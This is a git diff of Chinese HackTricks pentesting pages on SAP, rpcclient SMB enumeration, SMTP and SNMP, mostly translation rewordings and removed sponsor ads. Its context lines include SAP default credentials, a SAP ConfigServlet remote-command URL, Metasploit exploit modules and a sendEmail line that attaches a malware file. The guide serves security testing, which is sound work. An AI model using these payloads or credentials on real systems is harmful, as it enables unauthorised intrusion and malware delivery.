 - 如果有运行的 web 服务器,爬取 URL。
 - 如果在某些端口上有 web 服务器,模糊测试目录(可以使用 Burp Intruder)。以下是 SecLists 项目提供的一些优秀字典,用于查找默认 SAP ICM 路径和其他有趣的目录或文件:
 
@@ -65,7 +60,7 @@ msf auxiliary(sap_service_discovery) > run
 ```
 ## 测试厚客户端 / SAP GUI
 
-这是连接到 SAP GUI 的命令  
+连接到 SAP GUI 的命令如下
 `sapgui  `
 
 - 检查默认凭据 \(在 Bugcrowd 的漏洞评级分类中,这被视为 P1 -> 服务器安全配置错误 \| 使用默认凭据 \| 生产服务器\):
@@ -120,7 +115,7 @@ DEVELOPER:Down1oad:001
 BWDEVELOPER:Down1oad:001
 ```
 - 运行 Wireshark,然后使用你获得的凭据对客户端(SAP GUI)进行身份验证,因为某些客户端在没有 SSL 的情况下传输凭据。有两个已知的 Wireshark 插件也可以解析 SAP DIAG 协议使用的主要头部:SecureAuth Labs SAP 解析插件和 Positive Research Center 的 SAP DIAG 插件。
-- 检查特权升级,例如使用某些 SAP 事务代码(tcodes)对低权限用户:
+- 检查特权升级,例如使用一些低权限用户的 SAP 事务代码(tcodes):
 - SU01 - 创建和维护用户
 - SU01D - 显示用户
 - SU10 - 批量维护
@@ -139,7 +134,7 @@ BWDEVELOPER:Down1oad:001
 
 - 查找常见的 Web 漏洞(参考 OWASP Top 10),因为某些地方存在 XSS、RCE、XXE 等漏洞。
 - 查看 Jason Haddix 的 [“The Bug Hunters Methodology”](https://github.com/jhaddix/tbhm) 以测试 Web 漏洞。
-- 通过动词篡改进行身份验证绕过?也许 :)
+- 通过动词篡改进行身份验证绕过?也许是 :)
 - 打开 `http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees#`,然后点击“选择”按钮,在打开的窗口中按“搜索”。你应该能够看到 SAP 用户的列表(漏洞参考:[ERPSCAN-16-010](https://erpscan.com/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/))
 - 凭据是通过 HTTP 提交的吗?如果是,那么根据 Bugcrowd 的 [Vulnerability Rating Taxonomy](https://bugcrowd.com/vulnerability-rating-taxonomy) 被视为 P3:破坏的身份验证和会话管理 | 通过 HTTP 的弱登录功能。提示:也检查 [http://SAP:50000/startPage](http://sap:50000/startPage) 或登录门户 :)
 
@@ -205,13 +200,13 @@ BWDEVELOPER:Down1oad:001
 | `login/password_compliance_to_current_policy` | `0`        | 强制密码符合当前政策。                                                      |
 | `login/no_automatic_user_sapstar`           | `0`        | 禁用自动用户 SAPSTAR 分配。                                                  |
 | `login/min_password_specials`               | `0`        | 密码中要求的特殊字符的最小数量。                                            |
-| `login/min_password_lng`                    | `<8`       | 密码所需的最小长度。                                                        |
+| `login/min_password_lng`                    | `<8`       | 密码要求的最小长度。                                                        |
 | `login/min_password_lowercase`              | `0`        | 密码中要求的小写字母的最小数量。                                            |
 | `login/min_password_uppercase`              | `0`        | 密码中要求的大写字母的最小数量。                                            |
 | `login/min_password_digits`                 | `0`        | 密码中要求的数字的最小数量。                                                |
 | `login/min_password_letters`                | `1`        | 密码中要求的字母的最小数量。                                                |
 | `login/fails_to_user_lock`                  | `<5`       | 锁定用户帐户之前的失败登录尝试次数。                                        |
-| `login/password_expiration_time`            | `>90`      | 密码过期时间(天)。                                                        |
+| `login/password_expiration_time`            | `>90`      | 密码过期时间(天)。                                                         |
 | `login/password_max_idle_initial`           | `<14`      | 在要求重新输入密码之前的最大空闲时间(初始)。                              |
 | `login/password_max_idle_productive`        | `<180`     | 在要求重新输入密码之前的最大空闲时间(生产)。                              |
 | `login/password_downwards_compatibility`    | `0`        | 指定是否启用密码的向下兼容性。                                              |
@@ -322,7 +317,7 @@ exploit/windows/lpd/saplpd                                               2008-02
 exploit/windows/misc/sap_2005_license                                    2009-08-01       great      SAP Business One License Manager 2005 Buffer Overflow
 exploit/windows/misc/sap_netweaver_dispatcher                            2012-05-08       normal     SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow
 ```
-- 尝试使用一些已知的漏洞(查看 Exploit-DB)或攻击,例如在 SAP Portal 中的老牌“SAP ConfigServlet 远程代码执行”:
+- 尝试使用一些已知的漏洞(查看 Exploit-DB)或攻击,例如在 SAP Portal 中的经典“SAP ConfigServlet 远程代码执行”:
 ```text
 http://example.com:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=uname -a
 ```
@@ -370,8 +365,5 @@ bizploit> start
 - [https://resources.infosecinstitute.com/topic/pen-stesting-sap-applications-part-1/](https://resources.infosecinstitute.com/topic/pen-stesting-sap-applications-part-1/)
 - [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures)
 
-

-
-{% embed url="https://websec.nl/" %}
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md b/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
index 5e2a999ac..6a743f349 100644
--- a/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
+++ b/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
@@ -2,24 +2,19 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证:
-
-{% embed url="https://academy.8ksec.io/" %}
 
 ### 相对标识符 (RID) 和安全标识符 (SID) 概述
 
-**相对标识符 (RID)** 和 **安全标识符 (SID)** 是Windows操作系统中用于唯一标识和管理网络域内对象(如用户和组)的关键组件。
+**相对标识符 (RID)** 和 **安全标识符 (SID)** 是 Windows 操作系统中用于唯一标识和管理网络域内对象(如用户和组)的关键组件。
 
 - **SIDs** 作为域的唯一标识符,确保每个域都是可区分的。
-- **RIDs** 附加到SIDs上,以创建这些域内对象的唯一标识符。这种组合允许精确跟踪和管理对象权限和访问控制。
+- **RIDs** 附加到 SIDs 上,以创建这些域内对象的唯一标识符。这种组合允许精确跟踪和管理对象权限和访问控制。
 
-例如,一个名为 `pepe` 的用户可能具有一个唯一标识符,该标识符将域的SID与其特定的RID结合在一起,以十六进制(`0x457`)和十进制(`1111`)格式表示。这导致在域内为pepe生成一个完整且唯一的标识符,如:`S-1-5-21-1074507654-1937615267-42093643874-1111`。
+例如,一个名为 `pepe` 的用户可能具有一个唯一标识符,该标识符将域的 SID 与他的特定 RID 结合在一起,以十六进制 (`0x457`) 和十进制 (`1111`) 格式表示。这导致在域内为 pepe 生成一个完整且唯一的标识符,如:`S-1-5-21-1074507654-1937615267-42093643874-1111`。
 
 ### **使用 rpcclient 进行枚举**
 
-Samba的 **`rpcclient`** 工具用于通过命名管道与 **RPC 端点** 进行交互。以下命令可以在建立 **SMB 会话** 后发出,通常需要凭据。
+来自 Samba 的 **`rpcclient`** 工具用于通过命名管道与 **RPC 端点** 进行交互。以下命令可以在建立 **SMB 会话** 后发出,通常需要凭据。
 
 #### 服务器信息
 
@@ -30,7 +25,7 @@ Samba的 **`rpcclient`** 工具用于通过命名管道与 **RPC 端点** 进行
 - **可以列出用户**:使用 `querydispinfo` 和 `enumdomusers`。
 - **获取用户的详细信息**:使用 `queryuser <0xrid>`。
 - **获取用户的组**:使用 `queryusergroups <0xrid>`。
-- **通过** `lookupnames ` **检索用户的SID**。
+- **通过** `lookupnames ` **检索用户的 SID**。
 - **通过** `queryuseraliases [builtin|domain] ` **获取用户的别名**。
 ```bash
 # Users' RIDs-forced
@@ -54,7 +49,7 @@ done
 #### 域的枚举
 
 - **使用**: `enumdomains` **获取域**。
-- **通过**: `lsaquery` **检索域的SID**。
+- **通过**: `lsaquery` **检索域的 SID**。
 - **通过**: `querydominfo` **获取域信息**。
 
 #### 共享的枚举
@@ -62,36 +57,31 @@ done
 - **通过**: `netshareenumall` **获取所有可用的共享**。
 - **使用**: `netsharegetinfo ` **获取特定共享的信息**。
 
-#### 与SID的附加操作
+#### 与 SID 的附加操作
 
-- **通过名称获取SID**: `lookupnames `。
-- **通过**: `lsaenumsid` **获取更多SID**。
-- **通过**: `lookupsids ` **进行RID循环以检查更多SID**。
+- **通过名称获取 SID**: `lookupnames `。
+- **通过**: `lsaenumsid` **获取更多 SID**。
+- **通过**: `lookupsids ` **进行 RID 循环以检查更多 SID**。
 
 #### **额外命令**
 
 | **命令**             | **接口**                                                                                                                                     | **描述**                                                                                                                               |
 | ------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- |
 | queryuser           | SAMR                                                                                                                                              | 检索用户信息                                                                                                                           |
-| querygroup          | 检索组信息                                                                                                                        |                                                                                                                                           |
-| querydominfo        | 检索域信息                                                                                                                       |                                                                                                                                           |
-| enumdomusers        | 枚举域用户                                                                                                                            |                                                                                                                                           |
-| enumdomgroups       | 枚举域组                                                                                                                           |                                                                                                                                           |
-| createdomuser       | 创建域用户                                                                                                                              |                                                                                                                                           |
-| deletedomuser       | 删除域用户                                                                                                                              |                                                                                                                                           |
-| lookupnames         | LSARPC                                                                                                                                            | 查找用户名到SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) 值 |
-| lookupsids          | 查找SID到用户名 (RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9) 循环) |                                                                                                                                           |
-| lsaaddacctrights    | 向用户账户添加权限                                                                                                                      |                                                                                                                                           |
-| lsaremoveacctrights | 从用户账户移除权限                                                                                                                 |                                                                                                                                           |
-| dsroledominfo       | LSARPC-DS                                                                                                                                         | 获取主要域信息                                                                                                            |
-| dsenumdomtrusts     | 枚举AD森林中的受信域                                                                                                     |                                                                                                                                           |
+| querygroup          | 检索组信息                                                                                                                                        |                                                                                                                                           |
+| querydominfo        | 检索域信息                                                                                                                                        |                                                                                                                                           |
+| enumdomusers        | 枚举域用户                                                                                                                                      |                                                                                                                                           |
+| enumdomgroups       | 枚举域组                                                                                                                                       |                                                                                                                                           |
+| createdomuser       | 创建域用户                                                                                                                                      |                                                                                                                                           |
+| deletedomuser       | 删除域用户                                                                                                                                      |                                                                                                                                           |
+| lookupnames         | LSARPC                                                                                                                                            | 查找用户名到 SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) 值 |
+| lookupsids          | 查找 SID 到用户名 (RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9) 循环) |                                                                                                                                           |
+| lsaaddacctrights    | 向用户账户添加权限                                                                                                                              |                                                                                                                                           |
+| lsaremoveacctrights | 从用户账户移除权限                                                                                                                               |                                                                                                                                           |
+| dsroledominfo       | LSARPC-DS                                                                                                                                         | 获取主要域信息                                                                                                                          |
+| dsenumdomtrusts     | 枚举 AD 林中的受信域                                                                                                                             |                                                                                                                                           |
 
-要**更好地理解**工具 _**samrdump**_ **和** _**rpcdump**_ 的工作原理,您应该阅读 [**Pentesting MSRPC**](../135-pentesting-msrpc.md)。
+要更好地**理解**工具 _**samrdump**_ **和** _**rpcdump**_ 的工作原理,您应该阅读 [**Pentesting MSRPC**](../135-pentesting-msrpc.md)。
 
-

-
-通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证:
-
-{% embed url="https://academy.8ksec.io/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-smtp/README.md b/src/network-services-pentesting/pentesting-smtp/README.md
index 64acbe98d..5cffbb748 100644
--- a/src/network-services-pentesting/pentesting-smtp/README.md
+++ b/src/network-services-pentesting/pentesting-smtp/README.md
@@ -2,14 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 ## **基本信息**
 
 **简单邮件传输协议 (SMTP)** 是在 TCP/IP 套件中用于 **发送和接收电子邮件** 的协议。由于其在接收方排队消息的限制,SMTP 通常与 **POP3 或 IMAP** 一起使用。这些附加协议使用户能够将消息存储在服务器邮箱中并定期下载。
@@ -25,11 +17,11 @@ PORT   STATE SERVICE REASON  VERSION
 
 如果你有机会**让受害者给你发送一封邮件**(例如通过网页的联系表单),请这样做,因为**你可以通过查看邮件的头部了解受害者的内部拓扑**。
 
-你也可以从SMTP服务器获取一封邮件,尝试**向该服务器发送一封到不存在地址的邮件**(因为服务器会向攻击者发送一封NDN邮件)。但请确保你从一个允许的地址发送邮件(检查SPF策略),并且你可以接收NDN消息。
+你也可以从SMTP服务器获取一封邮件,尝试**向该服务器发送一封邮件到一个不存在的地址**(因为服务器会向攻击者发送一封NDN邮件)。但是,请确保你从一个允许的地址发送邮件(检查SPF策略),并且你可以接收NDN消息。
 
 你还应该尝试**发送不同的内容,因为你可以在头部找到更有趣的信息**,例如:`X-Virus-Scanned: by av.domain.com`\
 你应该发送EICAR测试文件。\
-检测到**AV**可能允许你利用**已知漏洞**。
+检测**AV**可能允许你利用**已知的漏洞**。
 
 ## Basic actions
 
@@ -156,21 +148,13 @@ Metasploit: auxiliary/scanner/smtp/smtp_enum
 smtp-user-enum: smtp-user-enum -M  -u  -t 
 Nmap: nmap --script smtp-enum-users 
 ```
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 ## DSN 报告
 
-**投递状态通知报告**:如果您向一个组织发送电子邮件到一个**无效地址**,该组织会通知您该地址无效,并**回复您一封邮件**。**返回邮件的头部**将**包含**可能的**敏感信息**(如与报告交互的邮件服务的IP地址或防病毒软件信息)。
+**投递状态通知报告**:如果您向一个组织发送电子邮件到一个**无效地址**,该组织会通知您该地址无效,并**将邮件发送回您**。返回邮件的**头部**将**包含**可能的**敏感信息**(如与报告交互的邮件服务的IP地址或防病毒软件信息)。
 
 ## [命令](smtp-commands.md)
 
-### 从Linux控制台发送电子邮件
+### 从 Linux 控制台发送电子邮件
 ```bash
 sendEmail -t to@domain.com -f from@attacker.com -s  -u "Important subject" -a /tmp/malware.pdf
 Reading message body from STDIN because the '-m' option was not used.
@@ -250,7 +234,7 @@ smtp-smuggling.md
 ### SPF
 
 > [!CAUTION]
-> SPF [在 2014 年被“弃用”](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/)。这意味着您应该在 `domain.com` 中创建 **TXT 记录**,而不是在 `_spf.domain.com` 中创建,使用 **相同的语法**。\
+> SPF [在 2014 年被“弃用”](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/)。这意味着您应该在 `domain.com` 中创建 **TXT 记录**,而不是在 `_spf.domain.com` 中,使用 **相同的语法**。\
 > 此外,为了重用以前的 SPF 记录,通常会发现类似于 `"v=spf1 include:_spf.google.com ~all"` 的内容。
 
 **发送方策略框架**(SPF)是一种机制,使邮件传输代理(MTA)能够通过查询组织定义的授权邮件服务器列表来验证发送电子邮件的主机是否被授权。该列表指定了 **被授权代表域名发送电子邮件的 IP 地址/范围、域名和其他实体**,并在 SPF 记录中包含各种“**机制**”。
@@ -262,26 +246,26 @@ smtp-smuggling.md
 | 机制      | 描述                                                                                                                                                                                                                                                                                                                         |
 | --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
 | ALL       | 始终匹配;用于默认结果,如 `-all`,适用于未被先前机制匹配的所有 IP。                                                                                                                                                                                                                                  |
-| A         | 如果域名有一个地址记录(A 或 AAAA),可以解析为发送者的地址,则匹配。                                                                                                                                                                                                                   |
+| A         | 如果域名有一个地址记录(A 或 AAAA),且可以解析为发送者的地址,则匹配。                                                                                                                                                                                                                   |
 | IP4       | 如果发送者在给定的 IPv4 地址范围内,则匹配。                                                                                                                                                                                                                                                                              |
 | IP6       | 如果发送者在给定的 IPv6 地址范围内,则匹配。                                                                                                                                                                                                                                                                              |
 | MX        | 如果域名有一个 MX 记录解析为发送者的地址,则匹配(即邮件来自该域的一个入站邮件服务器)。                                                                                                                                                                          |
 | PTR       | 如果客户端地址的域名(PTR 记录)在给定域中,并且该域名解析为客户端地址(前向确认的反向 DNS),则匹配。此机制不推荐使用,尽可能避免。                                                                                     |
 | EXISTS    | 如果给定的域名解析为任何地址,则匹配(无论解析为哪个地址)。这很少使用。与 SPF 宏语言一起,它提供了更复杂的匹配,如 DNSBL 查询。                                                                                                                           |
-| INCLUDE   | 引用另一个域的策略。如果该域的策略通过,则此机制通过。但是,如果包含的策略失败,则继续处理。要完全委托给另一个域的策略,必须使用重定向扩展。                                                                                     |
+| INCLUDE   | 引用另一个域的策略。如果该域的策略通过,则此机制通过。然而,如果包含的策略失败,则继续处理。要完全委托给另一个域的策略,必须使用重定向扩展。                                                                                     |
 | REDIRECT  | 
重定向是指向另一个域名的指针,该域名托管 SPF 策略,它允许多个域共享相同的 SPF 策略。当处理大量共享相同电子邮件基础设施的域时,它非常有用。
将使用重定向机制中指示的域的 SPF 策略。
 |
 
-还可以识别 **限定符**,指示 **如果匹配机制应该采取什么措施**。默认情况下,使用 **限定符 "+"**(因此如果匹配任何机制,则表示允许)。\
-您通常会注意到 **每个 SPF 策略的末尾** 有类似于:**\~all** 或 **-all** 的内容。这用于指示 **如果发送者不匹配任何 SPF 策略,则应将电子邮件标记为不可信(\~)或拒绝(-)电子邮件。**
+还可以识别 **限定符**,指示 **如果匹配了某个机制应该采取什么措施**。默认情况下,使用 **限定符 "+"**(因此如果匹配了任何机制,则表示允许)。\
+您通常会注意到 **每个 SPF 策略的末尾** 有类似于:**\~all** 或 **-all** 的内容。这用于指示 **如果发送者不匹配任何 SPF 策略,则应将电子邮件标记为不可信(\~)或拒绝(-)该电子邮件。**
 
 #### 限定符
 
-策略中的每个机制可以由四个限定符之一前缀,以定义预期结果:
+策略中的每个机制可以用四个限定符之一作为前缀,以定义预期结果:
 
-- **`+`**:对应于 PASS 结果。默认情况下,机制假定此限定符,使得 `+mx` 等同于 `mx`。
-- **`?`**:表示 NEUTRAL 结果,类似于 NONE(没有特定策略)。
-- **`~`**:表示 SOFTFAIL,作为 NEUTRAL 和 FAIL 之间的中间状态。符合此结果的电子邮件通常被接受,但会相应标记。
-- **`-`**:表示 FAIL,建议直接拒绝电子邮件。
+- **`+`**:对应于通过结果。默认情况下,机制假定此限定符,使得 `+mx` 等同于 `mx`。
+- **`?`**:表示中立结果,类似于无(没有特定策略)。
+- **`~`**:表示软失败,作为中立和失败之间的中间状态。符合此结果的电子邮件通常被接受,但会被相应标记。
+- **`-`**:表示失败,建议直接拒绝该电子邮件。
 
 在即将到来的示例中,**google.com 的 SPF 策略** 被说明。请注意在第一个 SPF 策略中包含来自不同域的 SPF 策略:
 ```shell-session
@@ -363,7 +347,7 @@ _dmarc.bing.com.	3600	IN	TXT	"v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMA
 >
 > 具有通配符 A 或 MX 记录的网站也应该具有通配符 SPF 记录,形式为:\* IN TXT "v=spf1 -all"
 
-这很有道理——子域可能位于不同的地理位置,并且具有非常不同的 SPF 定义。
+这很有道理 - 子域可能位于不同的地理位置,并且具有非常不同的 SPF 定义。
 
 ### **开放转发**
 
@@ -512,7 +496,7 @@ s.sendmail(sender, [destination], msg_data)
 
 ### Postfix
 
-通常,如果已安装,`/etc/postfix/master.cf` 中包含 **在用户接收新邮件时执行的脚本**。例如,行 `flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` 意味着如果用户mark接收到新邮件,将执行 `/etc/postfix/filtering`。
+通常,如果已安装,`/etc/postfix/master.cf` 中包含 **在用户收到新邮件时执行的脚本**。例如,行 `flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` 意味着如果用户mark收到新邮件,将执行 `/etc/postfix/filtering`。
 
 其他配置文件:
 ```
@@ -575,12 +559,4 @@ Note: sourced from https://github.com/carlospolop/legion
 Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'
 
 ```
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**发现并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,找到让您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-smtp/smtp-commands.md b/src/network-services-pentesting/pentesting-smtp/smtp-commands.md
index 32a0008f8..2b1e5c9b5 100644
--- a/src/network-services-pentesting/pentesting-smtp/smtp-commands.md
+++ b/src/network-services-pentesting/pentesting-smtp/smtp-commands.md
@@ -2,30 +2,22 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**发现并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 **命令来自:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/)
 
 **HELO**\
-这是第一个SMTP命令:它开始对话,识别发送服务器,通常后面跟着其域名。
+这是第一个SMTP命令:它开始对话,识别发送者服务器,通常后面跟着其域名。
 
 **EHLO**\
-开始对话的替代命令,表明服务器正在使用扩展SMTP协议。
+一个替代命令,用于开始对话,强调服务器正在使用扩展SMTP协议。
 
 **MAIL FROM**\
-通过此SMTP命令,操作开始:发送者在“发件人”字段中声明源电子邮件地址,并实际开始电子邮件传输。
+通过这个SMTP命令,操作开始:发送者在“From”字段中声明源电子邮件地址,并实际开始电子邮件传输。
 
 **RCPT TO**\
-它识别电子邮件的收件人;如果有多个,命令会逐个地址重复。
+它识别电子邮件的收件人;如果有多个收件人,命令会逐个地址重复。
 
 **SIZE**\
-此SMTP命令通知远程服务器附加电子邮件的估计大小(以字节为单位)。它也可以用于报告服务器接受的最大消息大小。
+这个SMTP命令通知远程服务器附加电子邮件的估计大小(以字节为单位)。它也可以用来报告服务器接受的最大消息大小。
 
 **DATA**\
 通过DATA命令,电子邮件内容开始传输;通常后面跟着服务器给出的354回复代码,允许开始实际传输。
@@ -34,7 +26,7 @@
 请求服务器验证特定电子邮件地址或用户名是否实际存在。
 
 **TURN**\
-此命令用于在客户端和服务器之间反转角色,而无需运行新的连接。
+这个命令用于在客户端和服务器之间反转角色,而无需重新建立连接。
 
 **AUTH**\
 通过AUTH命令,客户端向服务器进行身份验证,提供其用户名和密码。这是保证正确传输的另一层安全性。
@@ -43,20 +35,12 @@
 它通知服务器正在进行的电子邮件传输将被终止,但SMTP对话不会关闭(如在QUIT的情况下)。
 
 **EXPN**\
-此SMTP命令请求确认邮件列表的身份。
+这个SMTP命令请求确认邮件列表的身份。
 
 **HELP**\
-这是客户端请求一些对成功传输电子邮件有用的信息。
+这是客户端请求一些可能对成功传输电子邮件有用的信息。
 
 **QUIT**\
 它终止SMTP对话。
 
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**发现并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-snmp/README.md b/src/network-services-pentesting/pentesting-snmp/README.md
index 4da50c7a9..8a28e3d47 100644
--- a/src/network-services-pentesting/pentesting-snmp/README.md
+++ b/src/network-services-pentesting/pentesting-snmp/README.md
@@ -2,15 +2,9 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_需要流利的波兰语书写和口语能力_)。
-
-{% embed url="https://www.stmcyber.com/careers" %}
-
 ## 基本信息
 
-**SNMP - 简单网络管理协议** 是一种用于监控网络中不同设备(如路由器、交换机、打印机、物联网设备等)的协议。
+**SNMP - 简单网络管理协议** 是一种用于监控网络中不同设备的协议(如路由器、交换机、打印机、物联网设备等)。
 ```
 PORT    STATE SERVICE REASON                 VERSION
 161/udp open  snmp    udp-response ttl 244   ciscoSystems SNMPv3 server (public)
@@ -21,7 +15,7 @@ PORT    STATE SERVICE REASON                 VERSION
 ### MIB
 
 为了确保 SNMP 访问在不同制造商和不同客户端-服务器组合之间正常工作,创建了 **管理信息库 (MIB)**。MIB 是 **存储设备信息的独立格式**。MIB 是一个 **文本** 文件,其中列出了设备的所有可查询 **SNMP 对象**,以 **标准化** 的树形层次结构呈现。它至少包含一个 `对象标识符` (`OID`),该标识符除了必要的 **唯一地址** 和 **名称** 外,还提供有关类型、访问权限和相应对象描述的信息。\
-MIB 文件采用 `抽象语法标记一号` (`ASN.1`) 基于 ASCII 文本格式编写。**MIB 不包含数据**,但它解释了 **在哪里找到哪些信息** 以及它的外观,返回特定 OID 的值,或使用哪种数据类型。
+MIB 文件采用 `抽象语法标记一` (`ASN.1`) 基于 ASCII 文本格式编写。**MIB 不包含数据**,但它们解释了 **在哪里找到哪些信息** 以及它们的外观,返回特定 OID 的值,或使用哪种数据类型。
 
 ### OIDs
 
@@ -46,16 +40,16 @@ MIB 对象 ID 或 OID 的最高级别分配给各种标准制定组织。在这
 
 - 1 – 这称为 ISO,表明这是一个 OID。这就是所有 OID 以“1”开头的原因。
 - 3 – 这称为 ORG,用于指定构建设备的组织。
-- 6 – 这是 dod 或国防部,最早建立互联网的组织。
+- 6 – 这是 dod 或国防部,是最早建立互联网的组织。
 - 1 – 这是互联网的值,表示所有通信将通过互联网进行。
 - 4 – 该值确定该设备是由私营组织制造的,而不是政府组织。
 - 1 – 该值表示该设备是由企业或商业实体制造的。
 
-这前六个值对于所有设备来说往往是相同的,它们提供了关于设备的基本信息。这个数字序列对于所有 OID 来说都是相同的,除非设备是由政府制造的。
+这前六个值对于所有设备通常是相同的,它们提供了关于设备的基本信息。这个数字序列对于所有 OID 都是相同的,除非设备是由政府制造的。
 
 接下来是下一组数字。
 
-- 1452 – 给出制造该设备的组织的名称。
+- 1452 – 给出制造该设备的组织名称。
 - 1 – 解释设备的类型。在这种情况下,它是一个闹钟。
 - 2 – 确定该设备是一个远程终端单元。
 
@@ -64,9 +58,9 @@ MIB 对象 ID 或 OID 的最高级别分配给各种标准制定组织。在这
 - 5 – 表示一个离散的报警点。
 - 1 – 设备中的特定点
 - 3 – 端口
-- 21 – 端口的地址
-- 1 – 端口的显示
-- 4 – 点号
+- 21 – 端口地址
+- 1 – 端口显示
+- 4 – 点编号
 - 7 – 点的状态
 
 ### SNMP 版本
@@ -84,7 +78,7 @@ MIB 对象 ID 或 OID 的最高级别分配给各种标准制定组织。在这
 - **`public`** 主要是 **只读** 功能
 - **`private`** **读/写** 一般
 
-请注意,**OID 的可写性取决于使用的社区字符串**,因此 **即使** 您发现“**public**”正在使用,您也可能能够 **写入某些值。** 另外,可能存在 **始终为“只读”的对象**。\
+请注意,**OID 的可写性取决于使用的社区字符串**,因此 **即使** 您发现 "**public**" 被使用,您也可能能够 **写入某些值。** 另外,可能存在 **始终为“只读”的对象**。\
 如果您尝试 **写入** 对象,将收到 **`noSuchName` 或 `readOnly` 错误**\*\*.\*\*
 
 在版本 1 和 2/2c 中,如果您使用 **错误** 的社区字符串,服务器将不会 **响应**。因此,如果它响应,则使用了 **有效的社区字符串**。
@@ -171,7 +165,7 @@ cisco-snmp.md
 
 ## 从 SNMP 到 RCE
 
-如果您拥有允许您 **写入值** 到 SNMP 服务的 **字符串**,您可能能够利用它来 **执行命令**:
+如果您拥有允许您在 SNMP 服务中 **写入值** 的 **字符串**,您可能能够利用它来 **执行命令**:
 
 {{#ref}}
 snmp-rce.md
@@ -179,7 +173,7 @@ snmp-rce.md
 
 ## **大规模 SNMP**
 
-[Braa](https://github.com/mteg/braa) 是一个大规模 SNMP 扫描器。这种工具的预期用途当然是进行 SNMP 查询——但与来自 net-snmp 的 snmpwalk 不同,它能够同时查询数十或数百个主机,并在一个进程中进行。因此,它消耗的系统资源非常少,并且扫描速度非常快。
+[Braa](https://github.com/mteg/braa) 是一个大规模 SNMP 扫描器。此类工具的预期用途当然是进行 SNMP 查询——但与来自 net-snmp 的 snmpwalk 不同,它能够同时查询数十或数百个主机,并且在一个进程中。因此,它消耗的系统资源非常少,并且扫描速度非常快。
 
 Braa 实现了自己的 SNMP 堆栈,因此不需要任何 SNMP 库,如 net-snmp。
 
@@ -205,13 +199,13 @@ grep -i "trap" *.snmp
 ```
 ### **用户名/密码**
 
